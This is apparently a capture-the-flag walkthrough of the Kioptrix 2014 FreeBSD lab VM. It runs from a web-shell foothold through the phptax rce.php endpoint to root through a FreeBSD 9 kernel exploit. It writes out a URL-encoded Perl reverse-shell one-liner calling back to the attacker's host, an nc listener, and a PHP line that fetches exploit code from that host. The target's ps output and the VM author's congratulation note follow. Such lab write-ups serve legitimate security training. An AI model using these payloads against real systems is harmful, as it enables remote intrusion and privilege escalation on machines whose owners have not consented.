#!/bin/sh ipfw -q -f flush cmd="ipfw -a add" pif="em0" # Hopefully DNS and DHCP stuff won't be blocked $cmd 0001 allow tcp from any to me 53 out via $pif setup keep-state $cmd 0002 allow udp from any to me 53 out via $pif keep-state $cmd 0003 allow log udp from any to me 67 out via $pif keep-state $cmd 0004 allow log udp from any to me 68 out via $pif keep-state $cmd 0010 allow all from any to any via lo0 $cmd 0020 allow tcp from any to any 80 out via $pif setup keep-state $cmd 0030 allow tcp from any to any 443 out via $pif setup keep-state $cmd 0040 allow tcp from any to any out setup keep-state # Deny ICMP requests $cmd 0100 deny icmp from any to any via $pif # Allow SSH and HTTP requests $cmd 0200 allow tcp from any to me 22 in via $pif setup limit src-addr 2 $cmd 0201 allow tcp from any to me 80 in via $pif setup limit src-addr 2 $cmd 0201 allow tcp from any to me 8080 in via $pif setup limit src-addr 2 # Attempt to stop OS finger printing ipfw add 780 deny log tcp from any to any 0 in via en0 setup keep-state ipfw add 781 deny log udp from any to any 0 in via en0 keep-state # Deny everything else and log $cmd 0999 deny log all from any to any
nc, wget,curl did not work
http://192.168.180.137:8080/phptax/data/rce.php?cmd=perl%20-v
http://192.168.180.137:8080/phptax/data/rce.php?cmd=ps%20aux
USER PID %CPU %MEM VSZ RSS TT STAT STARTED TIME COMMAND root 11 98.0 0.0 0 16 ?? RL 7:26AM 35:48.34 [idle] root 0 0.0 0.0 0 160 ?? DLs 7:26AM 0:00.03 [kernel] root 1 0.0 0.1 6280 604 ?? ILs 7:26AM 0:00.00 /sbin/init -- root 2 0.0 0.0 0 16 ?? DL 7:26AM 0:00.00 [mpt_recovery0] root 3 0.0 0.0 0 16 ?? DL 7:26AM 0:00.00 [fdc0] root 4 0.0 0.0 0 16 ?? DL 7:26AM 0:00.00 [sctp_iterator] root 5 0.0 0.0 0 16 ?? DL 7:26AM 0:00.00 [xpt_thrd] root 6 0.0 0.0 0 16 ?? DL 7:26AM 0:00.00 [pagedaemon] root 7 0.0 0.0 0 16 ?? DL 7:26AM 0:00.00 [vmdaemon] root 8 0.0 0.0 0 16 ?? DL 7:26AM 0:00.00 [pagezero] root 9 0.0 0.0 0 16 ?? DL 7:26AM 0:00.00 [bufdaemon] root 10 0.0 0.0 0 16 ?? DL 7:26AM 0:00.00 [audit] root 12 0.0 0.0 0 224 ?? WL 7:26AM 0:01.58 [intr] root 13 0.0 0.0 0 48 ?? DL 7:26AM 0:00.39 [geom] root 14 0.0 0.0 0 16 ?? DL 7:26AM 0:00.05 [yarrow] root 15 0.0 0.0 0 16 ?? DL 7:26AM 0:00.06 [syncer] root 16 0.0 0.0 0 16 ?? DL 7:26AM 0:00.00 [vnlru] root 17 0.0 0.0 0 16 ?? DL 7:26AM 0:00.01 [softdepflush] root 105 0.0 0.1 10060 1212 ?? Is 7:26AM 0:00.00 adjkerntz -i root 559 0.0 0.2 10052 1576 ?? Is 7:26AM 0:00.00 dhclient: em0 [ _dhcp 625 0.0 0.2 10052 1712 ?? Is 7:26AM 0:00.00 dhclient: em0 ( root 641 0.0 0.3 10372 3488 ?? Is 7:26AM 0:00.00 /sbin/devd root 833 0.0 0.2 12184 1628 ?? Is 7:26AM 0:00.00 /usr/sbin/syslo root 977 0.0 0.2 10056 1560 ?? I 7:26AM 0:00.00 /usr/local/osse ossec 981 0.0 0.3 10052 3404 ?? S 7:26AM 0:00.59 /usr/local/osse root 985 0.0 0.2 10052 1628 ?? S 7:26AM 0:00.02 /usr/local/osse root 989 0.0 0.2 10052 2128 ?? S 7:26AM 0:00.84 /usr/local/osse ossec 993 0.0 0.2 10052 1800 ?? S 7:26AM 0:00.00 /usr/local/osse mysql 1098 0.0 0.2 14636 1964 ?? Is 7:26AM 0:00.00 /bin/sh /usr/lo mysql 1178 0.0 4.6 219884 47144 ?? I 7:26AM 0:00.31 /usr/local/libe root 1192 0.0 1.3 206796 13556 ?? Ss 7:26AM 0:00.13 /usr/local/sbin root 1220 0.0 0.4 20384 4116 ?? Ss 7:26AM 0:00.02 sendmail: accep smmsp 1224 0.0 0.4 20384 4128 ?? Is 7:26AM 0:00.00 sendmail: Queue root 1230 0.0 0.2 14260 1716 ?? Ss 7:26AM 0:00.00 /usr/sbin/cron www 1241 0.0 2.0 210892 20464 ?? S 7:26AM 0:00.09 /usr/local/sbin www 1242 0.0 2.1 210892 21756 ?? S 7:26AM 0:00.04 /usr/local/sbin www 1243 0.0 2.1 210892 21768 ?? S 7:26AM 0:00.03 /usr/local/sbin www 1244 0.0 2.1 210892 21768 ?? I 7:26AM 0:00.03 /usr/local/sbin www 1245 0.0 2.1 210892 21768 ?? I 7:26AM 0:00.04 /usr/local/sbin root 1277 0.0 0.4 26372 3876 ?? I 7:26AM 0:00.77 /usr/local/lib/ www 1353 0.0 2.1 210892 21768 ?? S 7:28AM 0:00.12 /usr/local/sbin www 1494 0.0 1.4 206796 14536 ?? I 7:56AM 0:00.00 /usr/local/sbin www 1525 0.0 0.1 14328 1476 ?? R 8:03AM 0:00.00 ps aux root 1294 0.0 7.4 111632 76688 v0- S 7:26AM 0:38.15 /usr/local/bin/ root 1337 0.0 0.1 12184 1372 v0 Is+ 7:26AM 0:00.00 /usr/libexec/ge root 1338 0.0 0.1 12184 1372 v1 Is+ 7:26AM 0:00.00 /usr/libexec/ge root 1339 0.0 0.1 12184 1372 v2 Is+ 7:26AM 0:00.00 /usr/libexec/ge root 1340 0.0 0.1 12184 1372 v3 Is+ 7:26AM 0:00.00 /usr/libexec/ge root 1341 0.0 0.1 12184 1372 v4 Is+ 7:26AM 0:00.00 /usr/libexec/ge root 1342 0.0 0.1 12184 1372 v5 Is+ 7:26AM 0:00.00 /usr/libexec/ge root 1343 0.0 0.1 12184 1372 v6 Is+ 7:26AM 0:00.00 /usr/libexec/ge root 1344 0.0 0.1 12184 1372 v7 Is+ 7:26AM 0:00.00 /usr/libexec/ge
Let's try with perl
http://192.168.180.137:8080/phptax/data/rce.php?cmd=perl%20-MIO%20-e%20%27$p=fork;exit,if%28$p%29;$c=new%20IO::Socket::INET%28PeerAddr,%22192.168.180.132:443%22%29;STDIN-%3Efdopen%28$c,r%29;$~-%3Efdopen%28$c,w%29;system$_%20while%3C%3E;%27
On our end:
nc -nlvp 443
listening on [any] 443 ...
connect to [192.168.180.132] from (UNKNOWN) [192.168.180.137] 30456
whoami
www
USER PID %CPU %MEM VSZ RSS TT STAT STARTED TIME COMMAND
root 11 98.0 0.0 0 16 ?? RL 7:26AM 69:10.59 [idle]
root 1294 1.0 7.5 111632 76844 v0- S 7:26AM 1:13.97 /usr/local/bin/
root 0 0.0 0.0 0 160 ?? DLs 7:26AM 0:00.04 [kernel]
root 1 0.0 0.1 6280 604 ?? ILs 7:26AM 0:00.00 /sbin/init --
root 2 0.0 0.0 0 16 ?? DL 7:26AM 0:00.00 [mpt_recovery0]
root 3 0.0 0.0 0 16 ?? DL 7:26AM 0:00.01 [fdc0]
root 4 0.0 0.0 0 16 ?? DL 7:26AM 0:00.00 [sctp_iterator]
root 5 0.0 0.0 0 16 ?? DL 7:26AM 0:00.00 [xpt_thrd]
root 6 0.0 0.0 0 16 ?? DL 7:26AM 0:00.00 [pagedaemon]
root 7 0.0 0.0 0 16 ?? DL 7:26AM 0:00.00 [vmdaemon]
root 8 0.0 0.0 0 16 ?? DL 7:26AM 0:00.00 [pagezero]
root 9 0.0 0.0 0 16 ?? DL 7:26AM 0:00.01 [bufdaemon]
root 10 0.0 0.0 0 16 ?? DL 7:26AM 0:00.00 [audit]
root 12 0.0 0.0 0 224 ?? WL 7:26AM 0:03.02 [intr]
root 13 0.0 0.0 0 48 ?? DL 7:26AM 0:00.47 [geom]
root 14 0.0 0.0 0 16 ?? DL 7:26AM 0:00.09 [yarrow]
root 15 0.0 0.0 0 16 ?? DL 7:26AM 0:00.12 [syncer]
root 16 0.0 0.0 0 16 ?? DL 7:26AM 0:00.01 [vnlru]
root 17 0.0 0.0 0 16 ?? DL 7:26AM 0:00.02 [softdepflush]
root 105 0.0 0.1 10060 1212 ?? Is 7:26AM 0:00.00 adjkerntz -i
root 559 0.0 0.2 10052 1576 ?? Is 7:26AM 0:00.00 dhclient: em0 [
_dhcp 625 0.0 0.2 10052 1712 ?? Is 7:26AM 0:00.01 dhclient: em0 (
root 641 0.0 0.3 10372 3488 ?? Is 7:26AM 0:00.00 /sbin/devd
root 833 0.0 0.2 12184 1628 ?? Is 7:26AM 0:00.01 /usr/sbin/syslo
root 977 0.0 0.2 10056 1560 ?? S 7:26AM 0:00.01 /usr/local/osse
ossec 981 0.0 0.3 10052 3404 ?? I 7:26AM 0:00.59 /usr/local/osse
root 985 0.0 0.2 10052 1628 ?? S 7:26AM 0:00.04 /usr/local/osse
root 989 0.0 0.2 10052 2128 ?? I 7:26AM 0:01.48 /usr/local/osse
ossec 993 0.0 0.2 10052 1800 ?? S 7:26AM 0:00.00 /usr/local/osse
mysql 1098 0.0 0.2 14636 1964 ?? Is 7:26AM 0:00.00 /bin/sh /usr/lo
mysql 1178 0.0 4.6 219884 47144 ?? I 7:26AM 0:00.55 /usr/local/libe
root 1192 0.0 1.3 206796 13556 ?? Ss 7:26AM 0:00.16 /usr/local/sbin
root 1220 0.0 0.4 20384 4116 ?? Ss 7:26AM 0:00.04 sendmail: accep
smmsp 1224 0.0 0.4 20384 4128 ?? Is 7:26AM 0:00.00 sendmail: Queue
root 1230 0.0 0.2 14260 1716 ?? Ss 7:26AM 0:00.01 /usr/sbin/cron
www 1241 0.0 2.0 210892 20464 ?? I 7:26AM 0:00.09 /usr/local/sbin
www 1242 0.0 2.1 210892 21756 ?? I 7:26AM 0:00.04 /usr/local/sbin
www 1243 0.0 2.1 210892 21768 ?? I 7:26AM 0:00.04 /usr/local/sbin
www 1244 0.0 2.1 210892 21768 ?? I 7:26AM 0:00.04 /usr/local/sbin
www 1245 0.0 2.1 210892 21768 ?? I 7:26AM 0:00.04 /usr/local/sbin
root 1277 0.0 0.4 26404 3888 ?? I 7:26AM 0:01.48 /usr/local/lib/
www 1353 0.0 2.1 210892 21768 ?? I 7:28AM 0:00.12 /usr/local/sbin
www 1494 0.0 1.4 206796 14552 ?? S 7:56AM 0:00.01 /usr/local/sbin
www 1631 0.0 0.5 30260 5572 ?? S 8:34AM 0:00.00 perl -MIO -e $p
www 1643 0.0 0.1 14328 1472 ?? R 8:37AM 0:00.00 ps -aux
root 1337 0.0 0.1 12184 1372 v0 Is+ 7:26AM 0:00.00 /usr/libexec/ge
root 1338 0.0 0.1 12184 1372 v1 Is+ 7:26AM 0:00.00 /usr/libexec/ge
root 1339 0.0 0.1 12184 1372 v2 Is+ 7:26AM 0:00.00 /usr/libexec/ge
root 1340 0.0 0.1 12184 1372 v3 Is+ 7:26AM 0:00.00 /usr/libexec/ge
root 1341 0.0 0.1 12184 1372 v4 Is+ 7:26AM 0:00.00 /usr/libexec/ge
root 1342 0.0 0.1 12184 1372 v5 Is+ 7:26AM 0:00.00 /usr/libexec/ge
root 1343 0.0 0.1 12184 1372 v6 Is+ 7:26AM 0:00.00 /usr/libexec/ge
root 1344 0.0 0.1 12184 1372 v7 Is+ 7:26AM 0:00.00 /usr/libexec/ge
We already know from the passwd file that this is FreeBSD 9.00 so it is time to exploit:
https://www.exploit-db.com/exploits/28718/
We download the file with a this php I have prepared:
echo "<?php file_put_contents('28718.c', fopen('http://192.168.180.132/28718.c', 'r')); ?>" > down2.php
./28718
[+] SYSRET FUCKUP!!
[+] Start Engine...
[+] Crotz...
[+] Crotz...
[+] Crotz...
[+] Woohoo!!!
.cshrc
.history
.k5login
.login
.mysql_history
.profile
congrats.txt
folderMonitor.log
httpd-access.log
lazyClearLog.sh
monitor.py
ossec-alerts.log
cat /root/congrats.txt
If you are reading this, it means you got root (or cheated).
Congratulations either way...
Hope you enjoyed this new VM of mine. As always, they are made for the beginner in
mind, and not meant for the seasoned pentester. However this does not mean one
can't enjoy them.
As with all my VMs, besides getting "root" on the system, the goal is to also
learn the basics skills needed to compromise a system. Most importantly, in my mind,
are information gathering & research. Anyone can throw massive amounts of exploits
and "hope" it works, but think about the traffic.. the logs... Best to take it
slow, and read up on the information you gathered and hopefully craft better
more targetted attacks.
For example, this system is FreeBSD 9. Hopefully you noticed this rather quickly.
Knowing the OS gives you any idea of what will work and what won't from the get go.
Default file locations are not the same on FreeBSD versus a Linux based distribution.
Apache logs aren't in "/var/log/apache/access.log", but in "/var/log/httpd-access.log".
It's default document root is not "/var/www/" but in "/usr/local/www/apache22/data".
Finding and knowing these little details will greatly help during an attack. Of course
my examples are specific for this target, but the theory applies to all systems.
As a small exercise, look at the logs and see how much noise you generated. Of course
the log results may not be accurate if you created a snapshot and reverted, but at least
it will give you an idea. For fun, I installed "OSSEC-HIDS" and monitored a few things.
Default settings, nothing fancy but it should've logged a few of your attacks. Look
at the following files:
/root/folderMonitor.log
/root/httpd-access.log (softlink)
/root/ossec-alerts.log (softlink)
The folderMonitor.log file is just a cheap script of mine to track created/deleted and modified
files in 2 specific folders. Since FreeBSD doesn't support "iNotify", I couldn't use OSSEC-HIDS
for this.
The httpd-access.log is rather self-explanatory .
Lastly, the ossec-alerts.log file is OSSEC-HIDS is where it puts alerts when monitoring certain
files. This one should've detected a few of your web attacks.
Feel free to explore the system and other log files to see how noisy, or silent, you were.
And again, thank you for taking the time to download and play.
Sincerely hope you enjoyed yourself.
Be good...
loneferret
http://www.kioptrix.com
p.s.: Keep in mind, for each "web attack" detected by OSSEC-HIDS, by
default it would've blocked your IP (both in hosts.allow & Firewall) for
600 seconds. I was nice enough to remove that part :)
Best Regards,
Yuriy Stanchev/URIX
References:
https://jivoi.github.io/2015/07/01/pentest-tips-and-tricks/